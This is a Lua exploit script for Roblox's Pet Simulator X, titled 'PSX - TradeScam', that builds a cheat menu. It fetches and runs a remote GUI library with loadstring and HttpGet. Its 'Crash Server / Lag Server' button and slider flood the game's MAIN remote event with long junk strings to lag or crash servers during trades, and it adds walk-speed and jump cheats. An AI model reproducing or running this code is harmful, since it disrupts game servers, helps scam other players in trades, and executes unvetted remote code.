local OrionLib = loadstring(game:HttpGet(('https://raw.githubusercontent.com/shlexware/Orion/main/source')))()

local Window = OrionLib:MakeWindow({Name = "PSX - TradeScam | Version 2.0", HidePremium = false, SaveConfig = true, ConfigFolder = "OrionTest"})

local Tab = Window:MakeTab({

	Name = "TradeScam",	Icon = "rbxassetid://4483345998",

	PremiumOnly = false

})

local Section = Tab:AddSection({

	Name = "Crashing takes 25 Secounds to be normal again"

})

Tab:AddLabel("Trade-Scam")

OrionLib:MakeNotification({

	Name = "You Are Logged in",

	Content = "You are Using the Trade Scam Script",

	Image = "rbxassetid://4483345998",

	Time = 5

})

Tab:AddSlider({

	Name = "Time to Crash",

	Min = 10,

	Max = 2000,

	Default = 5,

	Color = Color3.fromRGB(16,235,45),

	Increment = 1,

	ValueName = "Crash Time",

	Callback = function(Value)

		local createRemote = workspace:WaitForChild("__THINGS"):WaitForChild("__REMOTES"):WaitForChild("MAIN")

local remoteTypes = {"a","b","c","e"}

for i = 1, 3, 1 do

    createRemote:FireServer(remoteTypes[math.random(#remoteTypes)],tostring(tick()):rep(100))

end

	end    

})

Tab:AddButton({

	Name = "Crash Server / Lag Server",

	Callback = function()

		local createRemote = workspace:WaitForChild("__THINGS"):WaitForChild("__REMOTES"):WaitForChild("MAIN")

		local remoteTypes = {"a","b","c","e"}

		for i = 1, 3, 1 do

			createRemote:FireServer(remoteTypes[math.random(#remoteTypes)],tostring(tick()):rep(100))

		end

  	end    

})

local Tab = Window:MakeTab({

	Name = "Player",

	Icon = "rbxassetid://4483345998",

	PremiumOnly = false

})

Tab:AddSlider({

	Name = "WalkSpeed",

	Min = 34,

	Max = 500,

	Default = 5,

	Color = Color3.fromRGB(16,235,45),

	Increment = 1,

	ValueName = "Speed",

	Callback = function(s)

		game.Players.LocalPlayer.Character.Humanoid.WalkSpeed = s

	end    

})

Tab:AddSlider({

	Name = "JumpPower",

	Min = 50,

	Max = 500,

	Default = 5,

	Color = Color3.fromRGB(16,235,45),

	Increment = 1,

	ValueName = "Jump",

	Callback = function(s)

		game.Players.LocalPlayer.Character.Humanoid.JumpPower = s

	end    

})

local Tab = Window:MakeTab({

	Name = "Credits",

	Icon = "rbxassetid://4483345998",

	PremiumOnly = false

})

local Section = Tab:AddSection({

	Name = "Credits:  iburd#9494 | Helper: Lay#7616"

})
